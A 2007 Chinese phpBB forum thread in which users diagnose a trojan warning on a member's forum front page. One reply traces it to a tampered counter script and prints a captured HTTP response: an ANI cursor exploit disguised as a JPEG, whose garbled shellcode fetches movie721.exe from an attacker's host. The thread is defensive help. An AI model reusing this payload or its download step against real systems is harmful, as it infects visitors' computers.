1 頁 (共 1 頁)

打開論壇首頁,出現"木馬"

發表於 : 2007-03-30 03:02
阿古
請問,我最近的論壇好像中了"木馬" ,可能是裝了不良的MOD
我的空間是付費的,請問我要怎樣處理,才能找出這些木馬,把它清除?

發表於 : 2007-03-30 09:35
小竹子
沒有裝很多的話,先拔掉外掛,如果裝很多的話就......不好查了,不過你可以檢查一下相關需要設定資料夾 777 的先關閉看看

發表於 : 2007-03-31 03:28
阿古
我把mod都移除了,但打開首頁,還是出現木馬.

我的資料庫是否中毒啦?

求救 :cry:

發表於 : 2007-03-31 04:07
~倉木麻衣~
麻煩也請關心一下自己發表過的文章後續回應
http://phpbb-tw.net/phpbb/viewtopic.php?p=255791#255791
http://phpbb-tw.net/phpbb/viewtopic.php?p=255838#255838

問題的根本不是出在你的站, 而是player.htm所連結的counter.php檔被動手腳了
經檢查並與底下的文章對照, 發現這是利用微軟最新的漏洞所發動的Zero-Day Attack

代碼: 選擇全部

GET /muxiao2.jpg HTTP/1.1
Referer: http://222.73.19.183:8888/count2.php?uuid=1552307&ip1=xxxxxx&c_page=http%3A//www.slsfm.com/*****SPAM*****/&refer1=http%3A//www.slsfm.com/*****SPAM*****/&c_screen=1024x768
Host: jdnx.movie721.cn

HTTP/1.1 200 OK
Content-Type: image/jpeg

RIFF....ACONanih$...$.......	...........................TSIL........TSIL........anihR...01230123012301230123012301230123.444444444444444444444444444.....................%..d..0....R..:...........K...h....j............^...........W.......3.I3.......G._......[........>..cmd >.B./c "...3.PPh....RSP.!............>....t.@..>.."3.>.P...T3.3.....T}	>...............3.>.C,....QSPPPPPPWP...........j...8Ut..x.....t.U...@...hon..hurlm...D$.P./...P................jlhntdl...D$.P.....P................h32..huser...D$.P.....P.[..............._...h....P.z........K...h..
|P.f........7...hr...P.R........M...hO.O.P.>............h.N..P.*.......3.d.@0..x.>.@.>.p..>.@....>.@4..|>.@<.`6.l$$6.E<6.T.x..>.J.>.Z ...;I>.4...3.3.....t...
....6;|$(u.>.Z$..f>..K>.Z...>.....6.D$.a......http://jdnx.movie721.cn/movie721.exe.
相關資料請見PCZONE的【警告】台灣出現零時差攻擊 (Zero-Day Attack)
或是大炮開講裡的同篇文章台灣出現零時差攻擊 (Zero-Day Attack)

發表於 : 2007-04-01 11:32
kkt
倉大你真強的, 連 Zero-Day Attack 都給你對照找了出來.

能夠跟你學習真感榮幸!!


.

發表於 : 2007-04-02 03:17
~倉木麻衣~
目前微軟方面尚未釋出修正檔, 但是已有資安公司釋出的第三方的非官方補丁
eeye 是間頗具威信的國外資安公司, 微軟有許多漏洞都是由這家公司發現
下載位置:eEye’s temporary zero-day patch

安裝時, 直接按 next 進行下一步即可, 不需要按「Download Blink」
圖檔
當微軟釋出官方修正檔時, 請記得先反裝這個第三方補丁再行安裝
Organizations that choose to employ this workaround should take the steps required to uninstall it once the official Microsoft patch is released.
ps.
此補丁有提供反安裝功能

發表於 : 2007-04-02 04:46
jwxinst
其實我想請教倉大一件事, 就如kkt所知道的一樣
請問這段東西倉大是怎麼取出來@@

GET /muxiao2.jpg HTTP/1.1
.........
.........

(恕刪...)
因為我有點想知道, 增進一點知識@@

發表於 : 2007-04-02 05:09
~倉木麻衣~
jwxinst 寫:請問這段東西倉大是怎麼取出來@@

GET /muxiao2.jpg HTTP/1.1
.........
.........
不是什麼很高深的技巧, 利用抓封包軟體就可以取得了
例如 SmartSniffWireshark(前身為Ethereal, 需安裝WinPcap)

發表於 : 2007-04-02 12:42
chiouss
~倉木麻衣~ 寫:
jwxinst 寫:請問這段東西倉大是怎麼取出來@@

GET /muxiao2.jpg HTTP/1.1
.........
.........
不是什麼很高深的技巧, 利用抓封包軟體就可以取得了
例如 SmartSniffWireshark(前身為Ethereal, 需安裝WinPcap)
用 firefox 的話裝個 live http headers 就好了,不然就用 wget 的 debug mode,或是直接 telnet 到 port 80 也可以 :p

發表於 : 2007-04-03 12:32
jwxinst
哦!!!謝謝兩位的指導^^